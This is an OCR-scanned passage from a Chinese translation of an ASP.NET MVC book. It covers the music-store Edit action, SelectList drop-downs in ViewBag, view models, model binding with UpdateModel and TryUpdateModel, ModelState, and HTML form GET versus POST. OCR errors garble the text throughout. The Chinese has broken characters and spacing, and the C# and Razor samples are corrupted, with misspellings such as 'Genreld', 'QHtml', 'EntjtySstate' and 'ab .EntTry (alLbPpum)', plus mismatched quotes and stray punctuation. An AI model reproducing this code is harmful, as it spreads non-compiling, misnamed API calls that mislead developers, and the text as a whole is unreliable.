ViewBag.Genreld = new SelectList (db.Genres, "Genreld", Name ， 
album.GenreId);}; 

ViewBag.ArtistId = new SelectList (db.Artists, "ArtistlId"”, "Name", 
album.ArtistId); 

return View (album); 


Edit 操作 负责 构建 一 个 编辑 专辑 8 的 模型 。 它 使 用 MusicStoreDB 类 来 检索 专辑 ,并 将 
专辑 作为 模型 传递 给 视图 。 但 是 将 数据 放 进 ViewBasg 的 两 行 代码 的 作用 是 什么 呢 ? 当 看 到 
用 户 的 专辑 编辑 页 面 时 , 就 会 知道 这 两 行 到 底 代 码 起 了 多 大 的 作用 ! 专辑 编辑 界面 如 图 4-9 


所 未 。 
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当 用 户 编辑 专辑 时 ， 对 于 专辑 的 流派 和 艺术 家 属性 的 值 来 说 ， 不 希望 输入 目 由 格式 的 
文本 。 反 而 想 让 用 户 从 数据 库 中 已 经 存在 的 流派 和 艺术 家 中 选择 一 个 。 基 架 远 见 章 识 地 意 
识 到 了 这 一 点 ， 因 为 基 染 理解 专辑 、 艺 术 家 和 流派 三 者 之 间 的 关联 关系 。 

基 架 生成 的 编辑 视图 不 是 提供 给 用 户 文本 框 来 输入 流派 名 称 ， 而 是 让 用 户 在 下 拉 框 列 
表 中 选择 现 有 的 流派 。 下 面 是 存储 管理 器 的 Edit 视图 中 用 来 为 流派 创建 下 拉 列 表 的 代码 (图 
4-9 所 示 为 下 拉 列 表 中 有 两 个 可 用 的 流派 ): 

<div class="editor-field"™> 

QHtml .DropDownList ("GenreId", String.Empty) 


QHtml .ValidationMessageFor (model => model .GenrelId) 
</div> 


创建 下 拉 列 表 。 要 创建 这 个 列表 ， 和 需要 知道 所 有 可 得 到 的 列表 项 有 哪些 。 然 而 Album 模型 
对 象 不 会 保存 数据 库 中 所 有 可 得 到 的 流派 一 一 Album 对 象 仅 保存 与 它 本 身 相 关 的 流派 。 
Edit 操作 中 多 出 来 的 两 行 代码 就 是 为 了 构建 从 数据 库 中 所 有 可 得 到 的 流派 和 艺术 家 的 列 
表 ， 并 将 这 些 列表 存储 在 ViewBag 中 以 便 以 后 让 DropDownList 辅助 方法 检索 。 
ViewBag.Genreld = new SelectList (db.Genres, "Genreld", "Name", 
album.Genreld),; 


ViewBag.ArtistId = new SelectList (db.Artists, "ArtistlId"”, "Name", 
album.ArtistId).; 


代码 中 使 用 的 SelectList 类 用 于 表示 构建 下 拉 列 表 需 要 的 数据 。 其 中 构造 函数 的 第 1 

个 参数 指定 了 将 要 放 在 列表 中 的 项 。 第 2 个 参数 是 一 个 属性 名 称 ， 该 属性 包含 当 用 户 选 择 

个 指定 项 时 使 用 的 值 ( 键 值 ， 像 52 或 2)。 第 3 个 参数 是 每 一 项 要 显示 的 文本 ( 像 “Rock” 
或 “Rush”)。 最 后 ， 第 4 个 参数 包含 了 最 初 选 定 项 的 值 。 


1. 模型 和 视图 模型 终极 版 


还 记得 上 一 章 谈 到 的 视图 特定 模型 的 概念 吗 ? 专辑 编辑 情形 就 是 一 个 很 好 的 例子 ， 这 
里 的 模型 对 象 (Album 对 象 ) 并 没有 包含 编辑 视图 所 需要 的 全 部 信息 ， 因 为 男 外 还 裔 要 所 有 
可 能 的 流派 和 艺术 家 列表 。 针 对 这 个 问题 ， 有 两 种 可 能 的 解决 方案 。 

基 染 生成 代码 展示 了 第 一 种 解决 方案 : 将 额外 的 信息 传递 到 ViewBag 结构 中 。 这 个 方 
案 完 全 合理 而 且 还 便于 实现 , 但 是 一 些 人 想 通 过 一 个 强 类 型 的 模型 对 象 得 到 所 有 的 模型 数据 。 

强 类 型 模型 的 拥护 者 可 能 选择 第 二 种 方案 : 创建 一 个 视图 特定 模型 的 对 象 ， 将 专辑 信 
上 县、 流派 和 艺术 家 信息 传递 给 一 个 视图 。 这 个 模型 可 能 要 使 用 下 面 这 个 类 定义 : 

public class AlbumEditViewModel 

public Album AlbumToEdit { get; set; } 

public SelectList Genres { get; Set } 
public SelectList Artists { get; set; } 
| 
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这 样 Edit 操作 就 不 再 需要 将 信息 放 进 ViewBag， 而 需要 实例 化 AlbumEditViewModel 
类 ， 设 置 所 有 的 对 象 属 性 ， 并 将 视图 模型 传递 给 视图 。 这 两 种 方法 不 能 说 哪 一 种 好 、 哪 
种 坏 ， 而 应 该 根据 自身 特点 选择 一 种 适合 自己 的 方法 。 


2. Edit 视图 


尽管 下 面 没有 原样 地 列 出 Edit 视图 内 的 代码 ， 但 它 却 代表 了 Edit 视图 的 本 质 : 


Qusing (Html .BeginForm()) 1 
QHtml .DropDownList ("GenreId", String.Empty) 
QHtml .EditorFor (model => model .Title) 
QHtml .EditorFor (model => model .Price) 
<p> 
<input type="submit" value="Save™" /> 
</p> 
} 


该 视图 中 包含 一 个 表单 ,其 中 包含 有 让 用 户 输入 信息 的 各 种 input 元 素 。 其 中 一 些 input 
元 素 是 下 拉 列 表 (HTML <select> 元 素 )， 还 有 一 些 是 文本 框 控件 (HTML<input type="text"> 
元 素 )。 下 向 展示 了 Edit 视图 泻 染 的 HTML 的 本 质 : 


<form action="/storemanager/Edit/8" method="post"> 
<select 1Q= GenreIQ name="Genreld"> 
<option value=""></option> 
<option selected="selected" value="]1">Rock</option> 
<option value="2">Jazz</option> 
</select> 
<1input class="text-box single—line”" id="Title™” name="Title™ 
type="text" value="Caravan™" /> 
<input class="text-box single-line”" id="Price" name="Price™ 
type="text" value="9.99"™ /> 
<p> 
<input type="submit" value="Save™" /> 
</p> 
</form> 


当 用 户 单 击 页 面 上 的 Save 按钮 时 ，HTML 将 发 送 一 个 HTTP POST 请 求 ， 请 求 回 到 
/StoreManager/Edit/8 页 面 。 这 时 浏览 堪 会 自动 收集 用 户 在 表单 中 输入 的 所 有 信息 并 将 这 些 
值 (及 其 相关 的 name 属性 值 ) 放 在 请 求 中 一 起 发 送 。 这 里 注意 input 和 select 元 素 的 name 属 
性 ， 这 些 名 称 是 要 匹配 Album 模型 中 属性 名 称 的 ， 这 就 是 其 名 称 极 短 的 原因 所 在 。 
4.3.2 ”响应 编辑 时 的 POST 请 求 


接受 HTTP POST 请 求 来 编辑 专辑 信息 的 操作 的 名 称 也 是 Edit， 但 不 同 于 前 面 看 到 的 
Edit 操作 ， 因 为 它 有 一 个 HttpPost 操作 选择 器 特性 : 


/1 
// POST: /StoreManager/Edit/8 
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[HttpPpost]| 
public ActionResult Edit (Album album) 


{ 
ft (Modelstate.IsValid) 


{ 
db.Entry(album) .State = EntjtySstate.Modified; 
db.SaveChanges () ; 
return RedirectToAction("Index™"),; 
} 
ViewBag.GenrelId = new SelectList (db.Genres, "Genreld", 
"Name", album.GenrelId);} 
ViewBag.ArtistlId = new SelectList (db.Artists, "ArtistId", 
"Name", album.ArtistId); 
return View (album).; 
} 
这 个 操作 的 作用 就 是 接收 含有 用 户 所 有 编辑 项 的 Album 模型 对 象 , 并 将 这 个 对 象 保存 
到 数据 库 中 。 现 在 可 能 极 想 知道 更 新 后 的 Album 对 象 是 如 何 作 为 一 个 参数 出 现在 操作 中 
的 ， 这 个 问题 将 延迟 到 本 章 的 下 一 节 了 予以 解答 。 因 为 现在 的 重点 是 操作 内 部 的 讲解 。 


1. 编辑 happy path 


happy path 就 是 当 模 型 处 于 有 效 状 态 并 可 以 将 对 象 保存 到 数据 库 时 执行 的 代码 路 径 。 
操作 通过 ModelState.IsValid 属性 来 检查 模型 对 象 的 有 效 性 。 在 本 章 后 面 将 详细 探讨 这 个 属 
性 ， 并 且 在 第 6 章 可 以 学 习 如 何 问 模型 中 添加 验证 规则 。 这 里 就 把 ModelState.IsValid 属性 
看 做 一 个 信号 ， 来 确保 用 户 输入 有 用 的 专辑 特性 值 。 

如 果 模 型 处 于 有 效 状 态 ，Edit 操作 将 执行 下 面 这 一 行 代 码 : 


db.Entryl(album) . State = EntityState.Modified; 


这 行 代 人 码 是 告知 数据 上 下 文 该 对 象 在 数据 库 中 已 经 存在 (这 不 是 一 个 新 的 专辑 , 而 是 已 
经 存在 的 )， 所 以 框架 应 该 对 现 有 的 专辑 应 用 数据 库 中 的 值 而 不 要 再 创建 一 个 新 的 专辑 记 
录 。 下 一 行 代 码 将 在 数据 上 下 文中 调用 SaveChanges， 这 时 上 下 文生 成 一 条 SQL UPDATE 
命令 来 更 新 对 应 的 字段 值 以 保留 新 值 。 

2. 编辑 sad path 


sad path 是 当 模 型 无 效 时 操作 采用 的 路 径 。 在 sad path 中 ， 控 制 器 操作 需要 重新 创建 
Edit 视图 ， 以 便 用 户 改正 自身 产生 的 错误 。 例 如 ， 用 户 给 专辑 价格 输入 值 abc。 了 字符 串 abe 
不 是 一 个 有 效 的 十 进 制 数值 ， 这 样 模型 状态 就 是 无 效 的 。 据 此 ， 操 作 将 重建 下 拉 控 件 的 列 
表 并 要 求 Edit 视图 重新 演 染 。 对 此 ， 用 户 将 会 看 到 图 4-10 所 示 的 页 面 。 当 然 ， 我 们 会 在 
用 户 错误 到 达 服 务 器 之 前 捕获 这 个 错误 ， 因 为 ASPNET MVC 默认 提供 了 客户 端 验 证 ， 这 
些 天 于 客户 问 验 证 的 内 容 将 在 后 续 章 市 中 进行 学 习 。 
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The field Price must be a number. 
AlbumArtUrl 


4-10 


现在 可 能 极 想 知道 错误 信息 是 如 何 出 现 的 ， 这 同样 与 模型 验证 有 关 。 模 型 验证 将 在 第 
6 章 深入 讲解 。 现在 先 理解 这 个 Edit 操作 如 何 接收 一 个 包含 所 有 用 户 新 数据 值 的 Album 对 
象 。 该 过 程 的 幕后 推手 就 是 模型 绑 定 ， 它 是 ASPNET MVC 的 一 个 核心 特性 。 


4.4 ”模型 绑 定 


想象 日 己 要 实现 HTTP POST 的 Edit 操 作 , 并 且 还 不 知道 能 够 简化 编程 的 任何 ASPNET 
MVC 特性 。 因 为 作为 一 名 专业 的 Web 开发 人 员 ， 应 该 能 够 意识 到 Edit 视图 将 会 把 表单 中 
的 值 提交 给 服务 器 。 如 条 为 了 更 新 专辑 而 检索 这 些 值 ， 那 么 可 能 会 选择 直接 从 请 求 中 提取 
这 些 值 : 
[HttpPpost]| 
public ActionResult Edit (| 
{ 
Var album = new Album(); 
album.Title = Request.Form[" “Title™" |]; 
album.Price = Decimal .Parse (Request.Forml|l Price™|}; 


// ... and so on ... 


} 


正如 想象 的 那样 ， 代 码 会 变 得 见长 乏味 。 上 面 展 示 的 代码 只 是 设置 了 两 个 属性 ， 还 有 
4 个 、5 个 甚至 更 多 的 属性 需要 设置 。 从 Form 集合 (其 中 包括 所 有 通过 name 属性 提交 的 表 
单 值 ) 中 提取 属性 值 并 将 这 些 值 存储 在 Album 属性 中 ， 而 且 任 何不 是 字符 串 类 型 的 属性 都 
幸运 的 是 ，Edit 视图 认真 地 命名 了 每 一 个 表单 输入 来 匹配 Album 属性 。 如 果 还 记得 前 
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和 耐看 到 的 HIML 的 话 ， 就 应 该 知道 Title 值 的 input 元 素 的 名 称 是 Title，Price 值 的 input 元 
素 的 名 称 是 Price。 可 以 修改 视图 让 其 使 用 不 同 的 名 称 ( 像 Foo 和 Bar)， 但 是 这 样 做 只 能 使 
编写 操作 代码 更 加 困难 。 如 果真 是 这 样 的 话 ， 就 必须 记 住 Title 的 值 是 一 个 名 为 “Foo” 的 
input 元 素 ， 这 太 充 户 了 ! 

既然 input 元 素 名 称 匹 配属 性 名 称 ， 那 么 为 什么 不 根据 命名 约定 编写 一 段 通用 代码 来 
解决 这 个 问题 呢 ? 这 也 正 是 ASPNET MVC 提供 的 模型 绑 定 功 能 之 所 在 。 


4.4.1 DefaultModelBinder 

Edit 操作 简单 地 采用 Album 对 象 作为 参数 而 不 是 从 请 求 中 挖 取 表 单 值 ， 如 下 所 示 : 

[HttpPpost]| 

public ActionResult Edit (Album album) 

I 

} 

当 操 作 带 有 一 个 参数 时 ，MVC 运行 环境 就 会 使 用 一 个 模型 绑 定 右 来 构建 这 个 参数 。 
在 MVC 运行 时 中 ， 可 以 为 不 同类 型 的 模型 注册 多 个 模型 绑 定 器 ， 但 是 一 般 情况 下 默认 的 
绑 定 大 是 DefaultModelBinder。 在 Album 对 象 的 情形 中 , 默认 的 模型 绑 定 绒 检 查 Album 类 ， 
并 碍 找 能 用 于 绑 定 的 所 有 Album 属性 。 遵 照 前 面 介绍 的 命名 约定 ， 默 认 的 模型 绑 定 堪 能 | 
动 将 请 求 中 的 值 转换 和 移入 到 一 个 Album 对 象 中 (模型 绑 定 器 也 可 以 创建 一 个 对 象 实例 来 
填充 )。 

换 句 话说 , 当 模 型 绑 定 器 看 到 Album 具有 Title 属性 时 , 它 就 在 请 求 中 查找 名 为 “Title” 
的 参数 。 注 意 这 里 是 说 “在 请 求 中 ”而 不 是 “在 表单 集合 中 ”。 模 型 绑 定 侨 使 用 称 为 值 提供 
髓 (value provideD) 的 组 件 在 请 求 的 不 同 区 域 中 碍 找 参 数值 。 模 型 绑 定 堪 可 以 得 看 路 由 数据 、 
查询 学 符 串 和 表单 集合 ， 当 然 如 果 愿 意 的 话 也 可 以 添加 目 定 义 的 值 提 供 费 。 

模型 绑 定 不 局 限于 HTTP POST 操作 和 复合 类 型 参数 ( 像 Album 对 象 )。 模 型 绑 定 也 可 
以 将 原始 参数 传 入 操作 ， 就 像 用 于 Edit 操作 响应 HTTP GET 请 求 一 样 : 

public ActionResult Edit (int id) 

{ 


A 
} 


这 种 情况 下， 模型 绑 定 器 用 参数 (id) 的 名 字 在 请 求 中 查找 值 。 路 由 引擎 在 URL 
/StoreManager/Edit/8 中 找到 ID 值 , 但 不 是 由 路 由 引擎 而 是 模型 绑 定 器 将 其 从 路 由 数据 转换 
并 移入 到 id 参数 中 的 。 也 可 以 使 用 URL /StoreManager/Edit?id=8 来 调用 这 个 操作 ， 因 为 模 
型 绑 定 堪 可 以 在 得 询 字 符 串 集中 找到 id 参数 。 

模型 绑 定 器 有 点 像 搜救 犬 。 运 行 时 告知 模型 绑 定 堪 想 要 知道 某 个 id 属性 值 ， 然 后 绑 定 
器 开始 到 处 查找 名 为 id 的 参数 。 
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模型 绑 定 安全 性 简介 

有 时 模型 绑 定 锅 侵 略 性 的 搜索 行为 会 产生 意 想 不 到 的 后 果 。 上 面 提 到 了 默认 的 模型 绑 
定 需 如 何 碍 看 Album 对 象 的 可 用 属性 并 试图 通过 找 遇 请 求 为 每 一 个 属性 找到 一 个 匹配 值 。 
但 我 们 倡 尔 会 有 一 两 个 属性 可 能 不 想 (或 期 望 ) 使 用 模型 绑 定 右 来 设置 ， 这 时 就 要 注意 避免 

“重复 提交 ”(over-posting) 攻 击 了 。 通 过 一 次 成 功 的 重复 提交 攻击 ， 恶 意 的 攻击 者 可 以 毁 

坏 我 们 的 应 用 程 友 和 数据 ， 历 以 不 要 轻视 了 这 个 警告 。 

第 7 章 将 更 加 详细 地 探讨 重复 提交 了 攻击， 同时 也 介绍 一 些 防 御 攻 击 的 技术 。 现 在 请 记 
住 这 个 威胁 ， 并 请 在 后 面 务必 阅读 第 7 章 的 内 容 ! 
4.4.2 ” 显 式 模型 绑 定 

当 操 作 中 有 参数 时 ， 模 型 绑 定 会 隐 式 地 工作 。 也 可 以 使 用 控制 器 中 的 UpdateModel 和 
TryUpdateModel 方法 显 式 地 调用 模型 绑 定 。 如 果 在 模型 绑 定 期 间 出 现 错误 或 者 模型 是 无 效 
的 ，UpdateModel 方法 将 抛 出 一 个 异 币 。 如 采 使 用 UpdateModel 方法 而 不 市 操作 参数 ，Edit 
操作 将 如 下 所 示 : 


[HttpPost | 
public ActionResult Edit() 
{ 
Var album = new Album(); 
try 
| 


UpdateModel (alLbum) ; 
ab .EntTry (alLbPpum) .State = EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction(" InaeX ) :; 

} 

catch 

| 
ViewBag.GenrelId = new SelectList (db.cGenres, "Genreld", 

"Name", album.GenrelId),; 
ViewBag.ArtistId = new SelectList (db.Artists, "ArtistlId", 
"Name™", album.ArtistId); 

return Viewl(album); 


} 


TryUpdateModel 方法 也 可 以 调用 模型 绑 定 ， 但 不 会 抛 出 异 音 。TryUpdateModel 会 返回 
-个 布尔 类 型 的 值 一 一 true 表示 模型 绑 定 成 功 ， 模 型 是 有 效 的 ，false 表示 模型 绑 定 过 程 中 
出 现 了 错误 。 
[HttpPost | 
public ActionResult Edit() 
{ 


Var album = new Album(); 
if (TryUpdateModel (album)) 
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{ 
db.Entry (album) .State = EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction ("Index");} 
} 
else 
{ 
ViewBag.Genreld = new SelectList (db.Genres, "Genreld", 
"Name", album.Genreld); 
ViewBag.ArtistId = new SelectList (db.Artists, "ArtistlId"™, 
"Name™", album.ArtistId),; 
return View(album); 
} 


} 


模型 绑 定 的 副产品 就 是 模型 状态 。 模 型 绑 定 需 移 进 模型 中 的 每 一 个 值 在 模型 状态 中 都 
有 相应 的 一 条 记录 。 模 型 绑 定 后 ， 可 以 随时 得 看 模型 状态 以 检查 模型 绑 定 是 否 成 功 : 


[HttpPpost]| 

public ActionResult Edit() 

{ 
Var album = new Album().; 
TryUpdateModel (album).; 
if (Modelstate.IsValid) 


{ 
db.Entry(album) .State = EntityState.Modified; 
db.SaveChanges () ; 
return RedirectToAction("Index™); 
} 
else 
{ 
ViewBag.Genreld = new SelectList (db.cenres, "Genreld", 
"Name", album.Genreld).; 
ViewBag.ArtistlId = new SelectList (db.Artists, “ArtlstId ” ， 
"Name", album.ArtistId); 
return View(album).;} 
} 


} 


如 果 在 模型 绑 定 过 程 中 出 现 了 错误 ， 那 么 模型 状态 将 会 包含 导致 绑 定 失败 的 属性 名 、 
党 试 的 值 以 及 错误 消息 。 虽 然 模型 状态 可 以 用 来 调试 程序 ， 但 它 的 主要 作用 是 为 用 户 显示 
错误 信息 ， 以 告知 数据 录入 失败 。 接 下 来 的 两 章 将 讲解 模型 状态 如 何 使 HIML 辅助 方法 、 
MVC 验证 特性 和 模型 绑 定 一 起 工作 。 


4.5 小结 


章 侧 重 于 讲解 如 何 利 用 模型 对 象 来 构建 ASPNET MVC 应 用 程序 。 可 以 使 用 C#i 语 言 编 
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写 模型 定义 类 , 然后 根据 指定 的 模型 类 型 使 用 基 涤 生成 应 用 程序 的 其 他 部 分 , ASPNET MVC 
日 这 的 所 有 基 架 部 是 基于 实体 框架 运作 的 ， 但 是 基 架 是 可 扩展 并 可 上 日 定义 的 ， 所 以 基 架 可 
以 和 各 种 技术 一 起 使 用 。 

本 章 后 面部 分 还 探讨 了 模型 绑 定 , 现在 应 该 理解 了 如 何 使 用 模型 绑 定 特性 (而 个 是 在 整 
个 表单 集合 中 挖 取 ) 来 捕获 请 求 中 的 值 ， 也 应 该 知道 如 何人 查询 控制 费 操 作 中 的 字符 串 。 而 后 
对 重复 提交 攻击 中 的 模型 绑 定 序列 进行 了 简单 介绍 ， 这 些 内 容 在 后 面 第 7 章 中 会 进行 详细 
介绍 。 

然而 ， 此 时 只 是 了 解 了 模型 对 象 如 何 驱 动 应 用 程序 的 一 点 皮毛 。 在 接 下 来 的 儿 章 中 ， 
将 会 进一步 讲解 模型 及 其 相关 元 数据 是 如 何 影响 HTML 辅助 方法 的 输出 以 及 如 何 影 响 验 
证 的 。 


条 


上 


表单 和 HTML 辅助 方法 


本 章 内 容 简 介 : 

e 理解 表单 

e 如 何 利用 HTML 辅助 方法 
e 编辑 和 输入 的 辅助 方法 

e 显示 和 泻 染 的 辅助 方法 


顾名思义 ，HTML 辅助 方法 是 用 来 辅助 HTML 开发 的 。 这 里 可 能 有 一 个 疑问 : 诸如 向 
文本 编辑 器 中 输入 HIML 元 素 如 此 简单 的 任务 , 还 需要 任何 帮助 吗 ? 输入 标签 名 称 是 很 容 
易 的 事情 ， 但 是 确保 HTML 页 面 链 接 中 的 URL 指 同 正确 的 位 置 、 表 单元 素 拥 有 适用 于 模 
型 绑 定 的 合适 名 称 和 值 ， 以 及 当 模 型 绑 定 失败 时 其 他 元 素 能 够 显示 相应 的 错误 提示 消 妃 ， 
这 些 才 是 使 用 HTML 的 难点 。 

实现 所 有 这 些 方面 仅 靠 HTML 标记 是 远 远 不 够 的 , 还 需要 视图 和 运行 环境 之 间 的 协调 
配合 。 学 习 了 本 章 ， 就 可 以 很 容易 地 实现 它们 之 间 的 协调 。 然 而 ， 在 学 习 辅 助 方法 之 前 ， 
首先 要 学 习 表 单 。 应 用 程序 中 大 部 分 的 困难 工作 都 是 在 表单 中 完成 的 ， 同 时 表单 也 是 最 需 
要 HTML 辅助 方法 的 地 方 。 


5.1 表单 的 使 用 


这 里 我 们 可 能 会 疑惑 面向 专业 Web 开发 人 员 的 图 书 为 什么 还 要 浪费 笔墨 讲解 HTML 
的 form 标签 ， 难 道 它 不 容易 理解 吗 ? 
这 么 做 有 两 个 原因 。 
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e form 标签 是 强大 的 : 如 果 没 有 form 标签 ，Internet 将 变 成 一 个 枯燥 文档 的 只 谍 存 储 
库 。 您 将 不 能 进行 网 上 搜索 ， 也 不 能 在 网 上 购买 任何 东西 (甚至 是 这 本 书 )。 如 果 一 
个 那 恶 的 神偷 今 晚 盗 取 了 每 一 个 网 站 的 form 标签 ， 那 么 文明 将 于 明天 午餐 时 分 消 
失 殖 尽 。 

e 许多 转向 MVC 框架 的 开发 人 员 都 已 经 使 用 过 ASP.NET Web Forms: Web Forms 
没有 完全 利用 form 标签 的 强大 功能 (也 可 以 说 是 Web Forms 为 实现 目 己 的 目标 才 管 
理 和 利用 form 标签 的 )。 所 以 应 该 原谅 那些 忘记 form 标签 功能 (例如 创建 HITP GET 
请 求 的 功能 ) 的 Web Forms 开发 人 员 。 


5.1.1 action 和 method 特性 


表单 是 包含 输入 元 素 的 容 贷 ， 其 中 包含 按钮 、 复 选 框 、 文 本 框 等 元 素 。 表 单 中 的 这 些 
得 入 元 素 使 得 用 户 能 够 癌 页 面 中 输入 信息 ， 并 把 输入 的 信息 提交 给 服务 器 。 但 是 提交 给 什 
么 服务 器 呢 ? 这 些 信 息 又 是 如 何 到 达 服 务 右 的 呢 ? 这 些 问 题 的 答案 驶 在 两 个 非常 重要 的 
form 标签 特性 中 ， 即 action 和 method 特性 。 

action 特性 用 以 告知 Web 浏览 器 信息 发 往 哪里 ， 所 以 action 就 顺理成章 地 包含 一 个 
URL。 这 里 的 URL 可 以 是 相对 的 ,但 当 癌 一 个 不 同 的 应 用 程序 或 服务 器 发 送信 息 时 ， 它 也 
可 以 是 绝对 的 。 下 面 的 form 标签 将 可 以 从 任何 应 用 程序 中 辐 站 点 www.bing.com 的 search 
页 面 发 送 一 个 搜索 词 ( 和 输入 元 素 的 名 称 为 q): 

<form action="http://www.bing.com/search"> 

<input name="q" type="text™ /> 
<input type="submit" value="Searchi!™ /> 

</form> 

显而易见 ， 上 面 代码 段 中 的 form 标签 不 包含 method 特性 。 当 发 送信 息 时 ，method 特 
性 可 以 告知 浏览 需 是 使 用 HITP POST 还 是 使 用 HITP GET。 现 在 可 能 会 认为 表单 默认 的 
方法 是 HTTP POST。 毕竟 经 弟 通 过 提交 表单 来 更 新 目 己 的 资料 , 提交 信用 卡 信 息 来 购物 和 
对 YouTube 上 有 趣 的 动物 视频 发 表 评 论 。 然 而 ， 尽 管 如 此 ， 默 认 方法 仍 是 “get”， 上 所 以 默 
认 情 况 下 表单 发 送 的 是 HITP GET 请 求 。 

<form action="http://www.bing.com/search" method="get"> 

<input name="q" type="text™ /> 


<input type="submit" value="Search!" /> 
</form> 


当 用 户 使 用 HTTP GET 请 求 时 ， 浏 览 硕 会 提取 表单 中 输入 元 素 的 name 特性 值 及 其 相 
应 的 value 特性 值 ， 并 将 它们 放 入 到 得 询 字 符 串 中 。 换 名 话说， 上 面 的 表单 将 把 浏览 堪 导 航 
到 URL( 假 设 用 户 正 在 搜索 关键 词 love): http://www.bing.com/search?q=love。 


5.1.2 ”GET 方法 还 是 POST 方法 
如 果 不 想 让 浏览 器 把 输入 值 放 入 查询 字符 串 中 ， 而 是 想 放 入 HTTP 请 求 的 主体 中 ， 就 
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可 以 给 method 特性 赋值 post。 尽管 这 样 也 可 以 成 功 地 向 搜索 引擎 发 送 POST 请 求 并 能 看 
到 相应 的 搜索 结果 ， 但 是 相对 而 言 ， 使 用 HTTP GET 请 求 会 更 好 一 些 。 不 像 POST 请 求 ， 
GET 请 求 的 所 有 参数 都 在 URL 中 ， 因 此 可 以 为 GET 请 求 建 立 书签 。 可 以 在 电子 邮件 或 网 
页 中 将 这 些 URL 作为 超 链接 来 使 用 ， 除 此 之 外 ， 还 可 以 保留 所 有 的 表单 输入 值 。 

更 重要 的 是 , 因为 GET 方法 代表 的 是 虎 等 操作 和 只 读 操 作 , 所 以 它 是 做 这 些 工 作 的 最 
好 选择 。 换 而 言 之 ， 因 为 GET 不 (或 应 该 不 ) 会 改变 服务 器 上 的 状态 ， 所 以 客户 端 可 以 同 服 
务 器 重复 地 发 送 GET 请 求 而 不 会 产生 负面 影响 。 

男 一 方面 ，POST 请 求 可 以 用 来 提交 信用 卡 交 易 信 息 、 疝 购物 车 中 添加 专辑 或 者 修改 
密码 等 。 POST 请 求 通常 情况 下 会 改变 服务 器 上 的 状态 ， 重 复 提 交 POST 请 求 可 能 会 产生 
不 良 后 果 ( 比 如 购物 时 ， 由 于 重复 提交 两 次 POST 请 求 ， 而 产生 两 个 订单 )。 许 多 浏览 器 现 
在 都 可 以 帮助 用 户 避 免 重复 提交 POST 请 求 (图 5-1 展示 了 Chrome 浏览 右 在 刷新 POST 请 
求 时 的 反应 )。 

Confirm Form Resubmission LX 
The pagethat you re looling for used Information that you 


entered, Returming to that page might cause any action you 
took to be repeated. Do you want to continue? 


; | 
Continue | Cancel | 


图 5-1 


通常 情况 下 ， 在 Web 应 用 程序 中 ，GET 请 求 用 于 读 操 作 ，POST 请 求 用 于 写 操 作 ( 通 
常 包括 更 新 ,创建 和 删除 )。 为 音乐 付款 就 使 用 POST 请 求 ; 接 下 来 将 要 看 到 的 查询 音乐 情 
形 ， 就 需要 使 用 GET 请 求 。 


1. 用 搜索 表单 搜索 音乐 


假设 现在 想 要 让 音乐 商店 的 顾客 可 以 在 音乐 商店 应 用 程序 的 首页 搜索 音乐 。 与 前 面 搜 
索引 车 的 例子 类似 ， 这 里 也 需要 一 个 市 有 操作 和 方法 的 表单 。 把 下 面 的 代码 放 在 
HomeController 控制 硕 的 Index 视图 中 的 促销 div 下 和 耐 ， 这 样 就 完成 了 所 需要 的 表单 : 

<form action="/Home/Search™" method="get"> 

<input type="text" name="qg" /> 


<input type="submit" value="Search™ /> 
</form> 


可 以 对 上 面 的 代码 进行 各 种 修改 完善 ， 但 现在 还 是 按 诛 计划 顺序 介绍 示例 。 下 一 步 束 


定 ， 假 设 用 户 总 是 用 专辑 名 称 来 搜索 音乐 : 


public ActionResult Search (string 9q) 
{ 
Var albums = storeDB .Albums 
.Include ("Artist") 
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.Where(a => a.Title.Contains (gq)) 
.Take (10); 
return Viewl(lalbums),; 


} 


注意 ,这 里 的 Search 操作 希望 接收 名 为 q 的 衬 符 串 参 数 。 当 gq 出 现时 , ASPNET MVC 
框架 会 目 动 在 查询 字符 串 中 找到 这 个 值 ; 即便 搜索 表单 发 出 的 是 POST 请 求 而 非 GET 请 求 ， 
搜索 引擎 也 会 在 提交 的 表单 中 找到 这 个 值 。 

由 控制 器 告知 ASPNET MVC 框架 泻 染 视 图 ， 现 在 就 可 以 在 Home 视图 目录 下 创建 简 
单 的 Search.cshtml 视图 来 显示 搜索 结果 : 


Gmodel IEnumerable<MvcMusicStore.Models.Album> 
ef ViewBag.Title = "Search"; } 
<h2>Results</h2> 


<table> 
<tr> 
<th>Artist</th> 
<th>Title</th> 
<th>Price</th> 
</tr> 


Gforeach (var item in Model) { 
<tr> 
<td>@item.Artist.Name</td> 
<td>&@item.Title</td> 
<td>@string.Format ("{0:c}", item.Price)</td> 


</tr> 
} 
</table> 
假设 顾客 在 搜索 输入 框 中 输入 搜索 关键 字 “led”， 输 出 的 搜索 结果 将 如 图 5-2 所 示 。 
| 项 Eee] x | 
| < 中 削 操 A Iome /search?g=led 三 | 心 只 | 


GO Home Store Cart(l0) Admin 


ASP.NET MVC MUSIC STORE 


Raock Resuls 
|anss 二 | 
I E 
Pop Dread Zeppelin 
[isceo | 四 
Led /eppelw 
Latin 
eral Led ceppelin Led ceppeln | 
Lierrative LEeg Eppelin L 二 下 | ODe | 1 和 | 
Re Ea i 
nl Black Label Society AlCONG Fueled Brewtalty Live!l [Disc 人 
各 有 用 | - 


Biack Label Society Alcohal Fueled Brewtality Livel [Dse 2 


built with 51 


图 5-2 
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上 面 的 搜索 示例 展示 了 在 ASPNET MVC 框架 中 使 用 HIML 表单 的 简易 性 。Web 浏览 
需 从 表单 中 收集 用 户 输入 信息 并 癌 MVC 应 用 程序 发 送 一 个 请 求 ， 这 里 的 MVC 运行 时 可 
以 目 动 地 将 这 些 输入 值 传递 给 要 啊 应 的 操作 方法 的 参数 。 

当然 ， 并 非 所 有 的 情形 都 与 搜索 表单 一 样 容易 。 事 实 上 ， 刚 才 是 将 搜索 表单 简化 到 了 
很 脆弱 的 程度 。 如 果 把 刚才 的 应 用 程序 部 署 到 一 个 非 网 站 根 目录 的 目录 中 ， 或 者 修改 了 路 
由 定义 ， 那 么 刚才 手动 编写 的 操作 值 可 能 会 把 用 户 的 浏览 左 导 航 到 一 个 网 站 上 并 不 存在 的 
资源 处 。 请 记 住 ， 刚 才 已 经 把 “Home/Search” 赋 值 给 了 表单 的 action 特性 。 

<form action="/Home/Search™" method="get"> 

<input type="text" name="q" /> 


<input type="submit" value="Search™ /> 
</form> 


2. 通过 计算 action 特性 值 来 搜索 音乐 


更 好 的 办 法 是 通过 计算 action 特性 的 值 来 搜索 音乐 。 有 一 个 HIML 辅助 方法 可 以 代 荔 
